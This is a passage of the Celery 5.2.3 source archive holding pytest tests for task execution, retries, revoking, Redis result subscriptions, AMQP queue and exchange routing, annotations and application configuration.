result.failed() is True assert result.successful() is False @flaky def test_revoked(self, manager): """Testing revoking of task""" # Fill the queue with tasks to fill the queue for _ in range(4): sleeping.delay(2) # Execute task and revoke it result = add.apply_async((1, 1)) result.revoke() with pytest.raises(celery.exceptions.TaskRevokedError): result.get() assert result.status == 'REVOKED' assert result.ready() is True assert result.failed() is False assert result.successful() is False @flaky def test_wrong_arguments(self, manager): """Tests that proper exceptions are raised when task is called with wrong arguments.""" with pytest.raises(TypeError): add(5) with pytest.raises(TypeError): add(5, 5, wrong_arg=5) with pytest.raises(TypeError): add.delay(5) with pytest.raises(TypeError): add.delay(5, wrong_arg=5) # Tasks with typing=False are not checked but execution should fail result = add_not_typed.delay(5) with pytest.raises(TypeError): result.get(timeout=5) assert result.status == 'FAILURE' result = add_not_typed.delay(5, wrong_arg=5) with pytest.raises(TypeError): result.get(timeout=5) assert result.status == 'FAILURE' @flaky def test_retry(self, manager): """Tests retrying of task.""" # Tests when max. 
        # retries is reached
        result = retry.delay()
        for _ in range(5):
            status = result.status
            if status != 'PENDING':
                break
            sleep(1)
        assert status == 'RETRY'
        with pytest.raises(ExpectedException):
            result.get()
        assert result.status == 'FAILURE'

        # Tests when task is retried but after returns correct result
        result = retry.delay(return_value='bar')
        for _ in range(5):
            status = result.status
            if status != 'PENDING':
                break
            sleep(1)
        assert status == 'RETRY'
        assert result.get() == 'bar'
        assert result.status == 'SUCCESS'

    @flaky
    def test_task_accepted(self, manager, sleep=1):
        r1 = sleeping.delay(sleep)
        sleeping.delay(sleep)
        manager.assert_accepted([r1.id])

    @flaky
    def test_task_retried(self):
        res = retry_once.delay()
        assert res.get(timeout=TIMEOUT) == 1  # retried once

    @flaky
    def test_task_retried_priority(self):
        res = retry_once_priority.apply_async(priority=7)
        assert res.get(timeout=TIMEOUT) == 7  # retried once with priority 7

    @flaky
    def test_unicode_task(self, manager):
        manager.join(
            group(print_unicode.s() for _ in range(5))(),
            timeout=TIMEOUT, propagate=True,
        )

    @flaky
    def test_properties(self, celery_session_worker):
        res = return_properties.apply_async(app_id="1234")
        assert res.get(timeout=TIMEOUT)["app_id"] == "1234"


class tests_task_redis_result_backend:
    def setup(self, manager):
        if not manager.app.conf.result_backend.startswith('redis'):
            raise pytest.skip('Requires redis result backend.')

    def test_ignoring_result_no_subscriptions(self):
        assert get_active_redis_channels() == []
        result = add_ignore_result.delay(1, 2)
        assert result.ignored is True
        assert get_active_redis_channels() == []

    def test_asyncresult_forget_cancels_subscription(self):
        result = add.delay(1, 2)
        assert get_active_redis_channels() == [
            f"celery-task-meta-{result.id}"
        ]
        result.forget()
        assert get_active_redis_channels() == []

    def test_asyncresult_get_cancels_subscription(self):
        result = add.delay(1, 2)
        assert get_active_redis_channels() == [
            f"celery-task-meta-{result.id}"
        ]
        assert result.get(timeout=3) == 3
        assert get_active_redis_channels() == []


celery-5.2.3/t/skip.py

import sys

import pytest

if_pypy = pytest.mark.skipif(getattr(sys, 'pypy_version_info', None),
                             reason='PyPy not supported.')
if_win32 = pytest.mark.skipif(sys.platform.startswith('win32'),
                              reason='Does not work on Windows')

celery-5.2.3/t/unit/
celery-5.2.3/t/unit/__init__.py
celery-5.2.3/t/unit/app/
celery-5.2.3/t/unit/app/__init__.py
celery-5.2.3/t/unit/app/test_amqp.py
0ustar00asifasif00000000000000from datetime import datetime, timedelta from unittest.mock import Mock, patch import pytest from kombu import Exchange, Queue from celery import uuid from celery.app.amqp import Queues, utf8dict from celery.utils.time import to_utc class test_TaskConsumer: def test_accept_content(self, app): with app.pool.acquire(block=True) as con: app.conf.accept_content = ['application/json'] assert app.amqp.TaskConsumer(con).accept == { 'application/json', } assert app.amqp.TaskConsumer(con, accept=['json']).accept == { 'application/json', } class test_ProducerPool: def test_setup_nolimit(self, app): app.conf.broker_pool_limit = None try: delattr(app, '_pool') except AttributeError: pass app.amqp._producer_pool = None pool = app.amqp.producer_pool assert pool.limit == app.pool.limit assert not pool._resource.queue r1 = pool.acquire() r2 = pool.acquire() r1.release() r2.release() r1 = pool.acquire() r2 = pool.acquire() def test_setup(self, app): app.conf.broker_pool_limit = 2 try: delattr(app, '_pool') except AttributeError: pass app.amqp._producer_pool = None pool = app.amqp.producer_pool assert pool.limit == app.pool.limit assert pool._resource.queue p1 = r1 = pool.acquire() p2 = r2 = pool.acquire() r1.release() r2.release() r1 = pool.acquire() r2 = pool.acquire() assert p2 is r1 assert p1 is r2 r1.release() r2.release() class test_Queues: def test_queues_format(self): self.app.amqp.queues._consume_from = {} assert self.app.amqp.queues.format() == '' def test_with_defaults(self): assert Queues(None) == {} def test_add(self): q = Queues() q.add('foo', exchange='ex', routing_key='rk') assert 'foo' in q assert isinstance(q['foo'], Queue) assert q['foo'].routing_key == 'rk' def test_setitem_adds_default_exchange(self): q = Queues(default_exchange=Exchange('bar')) assert q.default_exchange queue = Queue('foo', exchange=None) queue.exchange = None q['foo'] = queue assert q['foo'].exchange == q.default_exchange def test_select_add(self): q = Queues() q.select(['foo', 'bar']) q.select_add('baz') assert sorted(q._consume_from.keys()) == ['bar', 'baz', 'foo'] def test_deselect(self): q = Queues() q.select(['foo', 'bar']) q.deselect('bar') assert sorted(q._consume_from.keys()) == ['foo'] def test_add_default_exchange(self): ex = Exchange('fff', 'fanout') q = Queues(default_exchange=ex) q.add(Queue('foo')) assert q['foo'].exchange.name == 'fff' def test_alias(self): q = Queues() q.add(Queue('foo', alias='barfoo')) assert q['barfoo'] is q['foo'] @pytest.mark.parametrize('queues_kwargs,qname,q,expected', [ ({'max_priority': 10}, 'foo', 'foo', {'x-max-priority': 10}), ({'max_priority': 10}, 'xyz', Queue('xyz', queue_arguments={'x-max-priority': 3}), {'x-max-priority': 3}), ({'max_priority': 10}, 'moo', Queue('moo', queue_arguments=None), {'x-max-priority': 10}), ({'max_priority': None}, 'foo2', 'foo2', None), ({'max_priority': None}, 'xyx3', Queue('xyx3', queue_arguments={'x-max-priority': 7}), {'x-max-priority': 7}), ]) def test_with_max_priority(self, queues_kwargs, qname, q, expected): queues = Queues(**queues_kwargs) queues.add(q) assert queues[qname].queue_arguments == expected class test_default_queues: @pytest.mark.parametrize('name,exchange,rkey', [ ('default', None, None), ('default', 'exchange', None), ('default', 'exchange', 'routing_key'), ('default', None, 'routing_key'), ]) def test_setting_default_queue(self, name, exchange, rkey): self.app.conf.task_queues = {} self.app.conf.task_default_exchange = exchange self.app.conf.task_default_routing_key = rkey 
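        # When task_default_exchange / task_default_routing_key are left as
        # None, Celery falls back to the default queue's name for both of
        # them; that is the case the (None, None) parameter set above covers.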
self.app.conf.task_default_queue = name assert self.app.amqp.queues.default_exchange.name == exchange or name queues = dict(self.app.amqp.queues) assert len(queues) == 1 queue = queues[name] assert queue.exchange.name == exchange or name assert queue.exchange.type == 'direct' assert queue.routing_key == rkey or name class test_default_exchange: @pytest.mark.parametrize('name,exchange,rkey', [ ('default', 'foo', None), ('default', 'foo', 'routing_key'), ]) def test_setting_default_exchange(self, name, exchange, rkey): q = Queue(name, routing_key=rkey) self.app.conf.task_queues = {q} self.app.conf.task_default_exchange = exchange queues = dict(self.app.amqp.queues) queue = queues[name] assert queue.exchange.name == exchange @pytest.mark.parametrize('name,extype,rkey', [ ('default', 'direct', None), ('default', 'direct', 'routing_key'), ('default', 'topic', None), ('default', 'topic', 'routing_key'), ]) def test_setting_default_exchange_type(self, name, extype, rkey): q = Queue(name, routing_key=rkey) self.app.conf.task_queues = {q} self.app.conf.task_default_exchange_type = extype queues = dict(self.app.amqp.queues) queue = queues[name] assert queue.exchange.type == extype class test_AMQP_proto1: def test_kwargs_must_be_mapping(self): with pytest.raises(TypeError): self.app.amqp.as_task_v1(uuid(), 'foo', kwargs=[1, 2]) def test_args_must_be_list(self): with pytest.raises(TypeError): self.app.amqp.as_task_v1(uuid(), 'foo', args='abc') def test_countdown_negative(self): with pytest.raises(ValueError): self.app.amqp.as_task_v1(uuid(), 'foo', countdown=-1232132323123) def test_as_task_message_without_utc(self): self.app.amqp.utc = False self.app.amqp.as_task_v1(uuid(), 'foo', countdown=30, expires=40) class test_AMQP: def setup(self): self.simple_message = self.app.amqp.as_task_v2( uuid(), 'foo', create_sent_event=True, ) self.simple_message_no_sent_event = self.app.amqp.as_task_v2( uuid(), 'foo', create_sent_event=False, ) def test_kwargs_must_be_mapping(self): with pytest.raises(TypeError): self.app.amqp.as_task_v2(uuid(), 'foo', kwargs=[1, 2]) def test_args_must_be_list(self): with pytest.raises(TypeError): self.app.amqp.as_task_v2(uuid(), 'foo', args='abc') def test_countdown_negative(self): with pytest.raises(ValueError): self.app.amqp.as_task_v2(uuid(), 'foo', countdown=-1232132323123) def test_Queues__with_max_priority(self): x = self.app.amqp.Queues({}, max_priority=23) assert x.max_priority == 23 def test_send_task_message__no_kwargs(self): self.app.amqp.send_task_message(Mock(), 'foo', self.simple_message) def test_send_task_message__properties(self): prod = Mock(name='producer') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, foo=1, retry=False, ) assert prod.publish.call_args[1]['foo'] == 1 def test_send_task_message__headers(self): prod = Mock(name='producer') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, headers={'x1x': 'y2x'}, retry=False, ) assert prod.publish.call_args[1]['headers']['x1x'] == 'y2x' def test_send_task_message__queue_string(self): prod = Mock(name='producer') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, queue='foo', retry=False, ) kwargs = prod.publish.call_args[1] assert kwargs['routing_key'] == 'foo' assert kwargs['exchange'] == '' def test_send_task_message__broadcast_without_exchange(self): from kombu.common import Broadcast evd = Mock(name='evd') self.app.amqp.send_task_message( Mock(), 'foo', self.simple_message, retry=False, routing_key='xyz', 
queue=Broadcast('abc'), event_dispatcher=evd, ) evd.publish.assert_called() event = evd.publish.call_args[0][1] assert event['routing_key'] == 'xyz' assert event['exchange'] == 'abc' def test_send_event_exchange_direct_with_exchange(self): prod = Mock(name='prod') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, queue='bar', retry=False, exchange_type='direct', exchange='xyz', ) prod.publish.assert_called() pub = prod.publish.call_args[1] assert pub['routing_key'] == 'bar' assert pub['exchange'] == '' def test_send_event_exchange_direct_with_routing_key(self): prod = Mock(name='prod') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, queue='bar', retry=False, exchange_type='direct', routing_key='xyb', ) prod.publish.assert_called() pub = prod.publish.call_args[1] assert pub['routing_key'] == 'bar' assert pub['exchange'] == '' def test_send_event_exchange_string(self): evd = Mock(name='evd') self.app.amqp.send_task_message( Mock(), 'foo', self.simple_message, retry=False, exchange='xyz', routing_key='xyb', event_dispatcher=evd, ) evd.publish.assert_called() event = evd.publish.call_args[0][1] assert event['routing_key'] == 'xyb' assert event['exchange'] == 'xyz' def test_send_task_message__with_delivery_mode(self): prod = Mock(name='producer') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, delivery_mode=33, retry=False, ) assert prod.publish.call_args[1]['delivery_mode'] == 33 def test_send_task_message__with_receivers(self): mocked_receiver = ((Mock(), Mock()), Mock()) with patch('celery.signals.task_sent.receivers', [mocked_receiver]): self.app.amqp.send_task_message(Mock(), 'foo', self.simple_message) def test_routes(self): r1 = self.app.amqp.routes r2 = self.app.amqp.routes assert r1 is r2 def update_conf_runtime_for_tasks_queues(self): self.app.conf.update(task_routes={'task.create_pr': 'queue.qwerty'}) self.app.send_task('task.create_pr') router_was = self.app.amqp.router self.app.conf.update(task_routes={'task.create_pr': 'queue.asdfgh'}) self.app.send_task('task.create_pr') router = self.app.amqp.router assert router != router_was class test_as_task_v2: def test_raises_if_args_is_not_tuple(self): with pytest.raises(TypeError): self.app.amqp.as_task_v2(uuid(), 'foo', args='123') def test_raises_if_kwargs_is_not_mapping(self): with pytest.raises(TypeError): self.app.amqp.as_task_v2(uuid(), 'foo', kwargs=(1, 2, 3)) def test_countdown_to_eta(self): now = to_utc(datetime.utcnow()).astimezone(self.app.timezone) m = self.app.amqp.as_task_v2( uuid(), 'foo', countdown=10, now=now, ) assert m.headers['eta'] == (now + timedelta(seconds=10)).isoformat() def test_expires_to_datetime(self): now = to_utc(datetime.utcnow()).astimezone(self.app.timezone) m = self.app.amqp.as_task_v2( uuid(), 'foo', expires=30, now=now, ) assert m.headers['expires'] == ( now + timedelta(seconds=30)).isoformat() def test_eta_to_datetime(self): eta = datetime.utcnow() m = self.app.amqp.as_task_v2( uuid(), 'foo', eta=eta, ) assert m.headers['eta'] == eta.isoformat() def test_callbacks_errbacks_chord(self): @self.app.task def t(i): pass m = self.app.amqp.as_task_v2( uuid(), 'foo', callbacks=[t.s(1), t.s(2)], errbacks=[t.s(3), t.s(4)], chord=t.s(5), ) _, _, embed = m.body assert embed['callbacks'] == [utf8dict(t.s(1)), utf8dict(t.s(2))] assert embed['errbacks'] == [utf8dict(t.s(3)), utf8dict(t.s(4))] assert embed['chord'] == utf8dict(t.s(5)) ././@PaxHeader0000000000000000000000000000002600000000000011453 
xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_annotations.py0000664000175000017500000000246300000000000020652 0ustar00asifasif00000000000000from celery.app.annotations import MapAnnotation, prepare from celery.utils.imports import qualname class MyAnnotation: foo = 65 class AnnotationCase: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add @self.app.task(shared=False) def mul(x, y): return x * y self.mul = mul class test_MapAnnotation(AnnotationCase): def test_annotate(self): x = MapAnnotation({self.add.name: {'foo': 1}}) assert x.annotate(self.add) == {'foo': 1} assert x.annotate(self.mul) is None def test_annotate_any(self): x = MapAnnotation({'*': {'foo': 2}}) assert x.annotate_any() == {'foo': 2} x = MapAnnotation() assert x.annotate_any() is None class test_prepare(AnnotationCase): def test_dict_to_MapAnnotation(self): x = prepare({self.add.name: {'foo': 3}}) assert isinstance(x[0], MapAnnotation) def test_returns_list(self): assert prepare(1) == [1] assert prepare([1]) == [1] assert prepare((1,)) == [1] assert prepare(None) == () def test_evalutes_qualnames(self): assert prepare(qualname(MyAnnotation))[0]().foo == 65 assert prepare([qualname(MyAnnotation)])[0]().foo == 65 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/app/test_app.py0000664000175000017500000011467400000000000017105 0ustar00asifasif00000000000000import gc import itertools import os import ssl import uuid from copy import deepcopy from datetime import datetime, timedelta from pickle import dumps, loads from unittest.mock import Mock, patch import pytest from vine import promise from celery import Celery, _state from celery import app as _app from celery import current_app, shared_task from celery.app import base as _appbase from celery.app import defaults from celery.backends.base import Backend from celery.contrib.testing.mocks import ContextMock from celery.exceptions import ImproperlyConfigured from celery.loaders.base import unconfigured from celery.platforms import pyimplementation from celery.utils.collections import DictAttribute from celery.utils.objects import Bunch from celery.utils.serialization import pickle from celery.utils.time import localize, timezone, to_utc from t.unit import conftest THIS_IS_A_KEY = 'this is a value' class ObjectConfig: FOO = 1 BAR = 2 object_config = ObjectConfig() dict_config = {'FOO': 10, 'BAR': 20} class ObjectConfig2: LEAVE_FOR_WORK = True MOMENT_TO_STOP = True CALL_ME_BACK = 123456789 WANT_ME_TO = False UNDERSTAND_ME = True class test_module: def test_default_app(self): assert _app.default_app == _state.default_app def test_bugreport(self, app): assert _app.bugreport(app=app) class test_task_join_will_block: def test_task_join_will_block(self, patching): patching('celery._state._task_join_will_block', 0) assert _state._task_join_will_block == 0 _state._set_task_join_will_block(True) assert _state._task_join_will_block is True # fixture 'app' sets this, so need to use orig_ function # set there by that fixture. 
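        # _task_join_will_block is the guard consulted when a task calls
        # result.get() on another result: joining from inside a task is
        # refused by default because it can deadlock the worker pool.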
res = _state.orig_task_join_will_block() assert res is True class test_App: def setup(self): self.app.add_defaults(deepcopy(self.CELERY_TEST_CONFIG)) def test_now(self): timezone_setting_value = 'US/Eastern' tz_utc = timezone.get_timezone('UTC') tz_us_eastern = timezone.get_timezone(timezone_setting_value) now = to_utc(datetime.utcnow()) app_now = self.app.now() assert app_now.tzinfo is tz_utc assert app_now - now <= timedelta(seconds=1) # Check that timezone conversion is applied from configuration self.app.conf.enable_utc = False self.app.conf.timezone = timezone_setting_value # timezone is a cached property del self.app.timezone app_now = self.app.now() assert app_now.tzinfo.zone == tz_us_eastern.zone diff = to_utc(datetime.utcnow()) - localize(app_now, tz_utc) assert diff <= timedelta(seconds=1) # Verify that timezone setting overrides enable_utc=on setting self.app.conf.enable_utc = True del self.app.timezone app_now = self.app.now() assert self.app.timezone == tz_us_eastern assert app_now.tzinfo.zone == tz_us_eastern.zone @patch('celery.app.base.set_default_app') def test_set_default(self, set_default_app): self.app.set_default() set_default_app.assert_called_with(self.app) @patch('celery.security.setup_security') def test_setup_security(self, setup_security): self.app.setup_security( {'json'}, 'key', 'cert', 'store', 'digest', 'serializer') setup_security.assert_called_with( {'json'}, 'key', 'cert', 'store', 'digest', 'serializer', app=self.app) def test_task_autofinalize_disabled(self): with self.Celery('xyzibari', autofinalize=False) as app: @app.task def ttafd(): return 42 with pytest.raises(RuntimeError): ttafd() with self.Celery('xyzibari', autofinalize=False) as app: @app.task def ttafd2(): return 42 app.finalize() assert ttafd2() == 42 def test_registry_autofinalize_disabled(self): with self.Celery('xyzibari', autofinalize=False) as app: with pytest.raises(RuntimeError): app.tasks['celery.chain'] app.finalize() assert app.tasks['celery.chain'] def test_task(self): with self.Celery('foozibari') as app: def fun(): pass fun.__module__ = '__main__' task = app.task(fun) assert task.name == app.main + '.fun' def test_task_too_many_args(self): with pytest.raises(TypeError): self.app.task(Mock(name='fun'), True) with pytest.raises(TypeError): self.app.task(Mock(name='fun'), True, 1, 2) def test_with_config_source(self): with self.Celery(config_source=ObjectConfig) as app: assert app.conf.FOO == 1 assert app.conf.BAR == 2 @pytest.mark.usefixtures('depends_on_current_app') def test_task_windows_execv(self): prev, _appbase.USING_EXECV = _appbase.USING_EXECV, True try: @self.app.task(shared=False) def foo(): pass assert foo._get_current_object() # is proxy finally: _appbase.USING_EXECV = prev assert not _appbase.USING_EXECV def test_task_takes_no_args(self): with pytest.raises(TypeError): @self.app.task(1) def foo(): pass def test_add_defaults(self): assert not self.app.configured _conf = {'foo': 300} def conf(): return _conf self.app.add_defaults(conf) assert conf in self.app._pending_defaults assert not self.app.configured assert self.app.conf.foo == 300 assert self.app.configured assert not self.app._pending_defaults # defaults not pickled appr = loads(dumps(self.app)) with pytest.raises(AttributeError): appr.conf.foo # add more defaults after configured conf2 = {'foo': 'BAR'} self.app.add_defaults(conf2) assert self.app.conf.foo == 'BAR' assert _conf in self.app.conf.defaults assert conf2 in self.app.conf.defaults def test_connection_or_acquire(self): with 
self.app.connection_or_acquire(block=True): assert self.app.pool._dirty with self.app.connection_or_acquire(pool=False): assert not self.app.pool._dirty def test_using_v1_reduce(self): self.app._using_v1_reduce = True assert loads(dumps(self.app)) def test_autodiscover_tasks_force_fixup_fallback(self): self.app.loader.autodiscover_tasks = Mock() self.app.autodiscover_tasks([], force=True) self.app.loader.autodiscover_tasks.assert_called_with( [], 'tasks', ) def test_autodiscover_tasks_force(self): self.app.loader.autodiscover_tasks = Mock() self.app.autodiscover_tasks(['proj.A', 'proj.B'], force=True) self.app.loader.autodiscover_tasks.assert_called_with( ['proj.A', 'proj.B'], 'tasks', ) self.app.loader.autodiscover_tasks = Mock() def lazy_list(): return ['proj.A', 'proj.B'] self.app.autodiscover_tasks( lazy_list, related_name='george', force=True, ) self.app.loader.autodiscover_tasks.assert_called_with( ['proj.A', 'proj.B'], 'george', ) def test_autodiscover_tasks_lazy(self): with patch('celery.signals.import_modules') as import_modules: def lazy_list(): return [1, 2, 3] self.app.autodiscover_tasks(lazy_list) import_modules.connect.assert_called() prom = import_modules.connect.call_args[0][0] assert isinstance(prom, promise) assert prom.fun == self.app._autodiscover_tasks assert prom.args[0](), [1, 2 == 3] def test_autodiscover_tasks__no_packages(self): fixup1 = Mock(name='fixup') fixup2 = Mock(name='fixup') self.app._autodiscover_tasks_from_names = Mock(name='auto') self.app._fixups = [fixup1, fixup2] fixup1.autodiscover_tasks.return_value = ['A', 'B', 'C'] fixup2.autodiscover_tasks.return_value = ['D', 'E', 'F'] self.app.autodiscover_tasks(force=True) self.app._autodiscover_tasks_from_names.assert_called_with( ['A', 'B', 'C', 'D', 'E', 'F'], related_name='tasks', ) def test_with_broker(self, patching): patching.setenv('CELERY_BROKER_URL', '') with self.Celery(broker='foo://baribaz') as app: assert app.conf.broker_url == 'foo://baribaz' def test_pending_configuration_non_true__kwargs(self): with self.Celery(task_create_missing_queues=False) as app: assert app.conf.task_create_missing_queues is False def test_pending_configuration__kwargs(self): with self.Celery(foo='bar') as app: assert app.conf.foo == 'bar' def test_pending_configuration__setattr(self): with self.Celery(broker='foo://bar') as app: app.conf.task_default_delivery_mode = 44 app.conf.worker_agent = 'foo:Bar' assert not app.configured assert app.conf.worker_agent == 'foo:Bar' assert app.conf.broker_url == 'foo://bar' assert app._preconf['worker_agent'] == 'foo:Bar' assert app.configured reapp = pickle.loads(pickle.dumps(app)) assert reapp._preconf['worker_agent'] == 'foo:Bar' assert not reapp.configured assert reapp.conf.worker_agent == 'foo:Bar' assert reapp.configured assert reapp.conf.broker_url == 'foo://bar' assert reapp._preconf['worker_agent'] == 'foo:Bar' def test_pending_configuration__update(self): with self.Celery(broker='foo://bar') as app: app.conf.update( task_default_delivery_mode=44, worker_agent='foo:Bar', ) assert not app.configured assert app.conf.worker_agent == 'foo:Bar' assert app.conf.broker_url == 'foo://bar' assert app._preconf['worker_agent'] == 'foo:Bar' def test_pending_configuration__compat_settings(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.conf.update( CELERY_ALWAYS_EAGER=4, CELERY_DEFAULT_DELIVERY_MODE=63, CELERYD_AGENT='foo:Barz', ) assert app.conf.task_always_eager == 4 assert app.conf.task_default_delivery_mode == 63 assert app.conf.worker_agent == 'foo:Barz' 
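            # CELERY_ALWAYS_EAGER, CELERY_DEFAULT_DELIVERY_MODE and
            # CELERYD_AGENT are old-style (pre-4.0) setting names; the
            # assertions in this test confirm they are transparently mapped
            # onto the lowercase equivalents (task_always_eager,
            # task_default_delivery_mode, worker_agent).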
assert app.conf.broker_url == 'foo://bar' assert app.conf.result_backend == 'foo' def test_pending_configuration__compat_settings_mixing(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.conf.update( CELERY_ALWAYS_EAGER=4, CELERY_DEFAULT_DELIVERY_MODE=63, CELERYD_AGENT='foo:Barz', worker_consumer='foo:Fooz', ) with pytest.raises(ImproperlyConfigured): assert app.conf.task_always_eager == 4 def test_pending_configuration__django_settings(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.config_from_object(DictAttribute(Bunch( CELERY_TASK_ALWAYS_EAGER=4, CELERY_TASK_DEFAULT_DELIVERY_MODE=63, CELERY_WORKER_AGENT='foo:Barz', CELERY_RESULT_SERIALIZER='pickle', )), namespace='CELERY') assert app.conf.result_serializer == 'pickle' assert app.conf.CELERY_RESULT_SERIALIZER == 'pickle' assert app.conf.task_always_eager == 4 assert app.conf.task_default_delivery_mode == 63 assert app.conf.worker_agent == 'foo:Barz' assert app.conf.broker_url == 'foo://bar' assert app.conf.result_backend == 'foo' def test_pending_configuration__compat_settings_mixing_new(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.conf.update( task_always_eager=4, task_default_delivery_mode=63, worker_agent='foo:Barz', CELERYD_CONSUMER='foo:Fooz', CELERYD_AUTOSCALER='foo:Xuzzy', ) with pytest.raises(ImproperlyConfigured): assert app.conf.worker_consumer == 'foo:Fooz' def test_pending_configuration__compat_settings_mixing_alt(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.conf.update( task_always_eager=4, task_default_delivery_mode=63, worker_agent='foo:Barz', CELERYD_CONSUMER='foo:Fooz', worker_consumer='foo:Fooz', CELERYD_AUTOSCALER='foo:Xuzzy', worker_autoscaler='foo:Xuzzy' ) def test_pending_configuration__setdefault(self): with self.Celery(broker='foo://bar') as app: assert not app.configured app.conf.setdefault('worker_agent', 'foo:Bar') assert not app.configured def test_pending_configuration__iter(self): with self.Celery(broker='foo://bar') as app: app.conf.worker_agent = 'foo:Bar' assert not app.configured assert list(app.conf.keys()) assert app.configured assert 'worker_agent' in app.conf assert dict(app.conf) def test_pending_configuration__raises_ImproperlyConfigured(self): with self.Celery(set_as_current=False) as app: app.conf.worker_agent = 'foo://bar' app.conf.task_default_delivery_mode = 44 app.conf.CELERY_ALWAYS_EAGER = 5 with pytest.raises(ImproperlyConfigured): app.finalize() with self.Celery() as app: assert not self.app.conf.task_always_eager def test_pending_configuration__ssl_settings(self): with self.Celery(broker='foo://bar', broker_use_ssl={ 'ssl_cert_reqs': ssl.CERT_REQUIRED, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key'}, redis_backend_use_ssl={ 'ssl_cert_reqs': ssl.CERT_REQUIRED, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key'}) as app: assert not app.configured assert app.conf.broker_url == 'foo://bar' assert app.conf.broker_use_ssl['ssl_certfile'] == \ '/path/to/client.crt' assert app.conf.broker_use_ssl['ssl_keyfile'] == \ '/path/to/client.key' assert app.conf.broker_use_ssl['ssl_ca_certs'] == \ '/path/to/ca.crt' assert app.conf.broker_use_ssl['ssl_cert_reqs'] == \ ssl.CERT_REQUIRED assert app.conf.redis_backend_use_ssl['ssl_certfile'] == \ '/path/to/client.crt' assert app.conf.redis_backend_use_ssl['ssl_keyfile'] == \ '/path/to/client.key' assert 
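            # config_from_object(..., namespace='CELERY') strips the prefix,
            # so CELERY_WORKER_AGENT is exposed as worker_agent; both the
            # prefixed and unprefixed names stay readable, as the serializer
            # assertions in this test show.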
app.conf.redis_backend_use_ssl['ssl_ca_certs'] == \ '/path/to/ca.crt' assert app.conf.redis_backend_use_ssl['ssl_cert_reqs'] == \ ssl.CERT_REQUIRED def test_repr(self): assert repr(self.app) def test_custom_task_registry(self): with self.Celery(tasks=self.app.tasks) as app2: assert app2.tasks is self.app.tasks def test_include_argument(self): with self.Celery(include=('foo', 'bar.foo')) as app: assert app.conf.include, ('foo' == 'bar.foo') def test_set_as_current(self): current = _state._tls.current_app try: app = self.Celery(set_as_current=True) assert _state._tls.current_app is app finally: _state._tls.current_app = current def test_current_task(self): @self.app.task def foo(shared=False): pass _state._task_stack.push(foo) try: assert self.app.current_task.name == foo.name finally: _state._task_stack.pop() def test_task_not_shared(self): with patch('celery.app.base.connect_on_app_finalize') as sh: @self.app.task(shared=False) def foo(): pass sh.assert_not_called() def test_task_compat_with_filter(self): with self.Celery() as app: check = Mock() def filter(task): check(task) return task @app.task(filter=filter, shared=False) def foo(): pass check.assert_called_with(foo) def test_task_with_filter(self): with self.Celery() as app: check = Mock() def filter(task): check(task) return task assert not _appbase.USING_EXECV @app.task(filter=filter, shared=False) def foo(): pass check.assert_called_with(foo) def test_task_sets_main_name_MP_MAIN_FILE(self): from celery.utils import imports as _imports _imports.MP_MAIN_FILE = __file__ try: with self.Celery('xuzzy') as app: @app.task def foo(): pass assert foo.name == 'xuzzy.foo' finally: _imports.MP_MAIN_FILE = None def test_can_get_type_hints_for_tasks(self): import typing with self.Celery() as app: @app.task def foo(parameter: int) -> None: pass assert typing.get_type_hints(foo) == {'parameter': int, 'return': type(None)} def test_annotate_decorator(self): from celery.app.task import Task class adX(Task): def run(self, y, z, x): return y, z, x check = Mock() def deco(fun): def _inner(*args, **kwargs): check(*args, **kwargs) return fun(*args, **kwargs) return _inner self.app.conf.task_annotations = { adX.name: {'@__call__': deco} } adX.bind(self.app) assert adX.app is self.app i = adX() i(2, 4, x=3) check.assert_called_with(i, 2, 4, x=3) i.annotate() i.annotate() def test_apply_async_adds_children(self): from celery._state import _task_stack @self.app.task(bind=True, shared=False) def a3cX1(self): pass @self.app.task(bind=True, shared=False) def a3cX2(self): pass _task_stack.push(a3cX1) try: a3cX1.push_request(called_directly=False) try: res = a3cX2.apply_async(add_to_parent=True) assert res in a3cX1.request.children finally: a3cX1.pop_request() finally: _task_stack.pop() def test_pickle_app(self): changes = {'THE_FOO_BAR': 'bars', 'THE_MII_MAR': 'jars'} self.app.conf.update(changes) saved = pickle.dumps(self.app) assert len(saved) < 2048 restored = pickle.loads(saved) for key, value in changes.items(): assert restored.conf[key] == value @patch('celery.bin.celery.celery') def test_worker_main(self, mocked_celery): self.app.worker_main(argv=['worker', '--help']) mocked_celery.main.assert_called_with( args=['worker', '--help'], standalone_mode=False) def test_config_from_envvar(self): os.environ['CELERYTEST_CONFIG_OBJECT'] = 't.unit.app.test_app' self.app.config_from_envvar('CELERYTEST_CONFIG_OBJECT') assert self.app.conf.THIS_IS_A_KEY == 'this is a value' def assert_config2(self): assert self.app.conf.LEAVE_FOR_WORK assert 
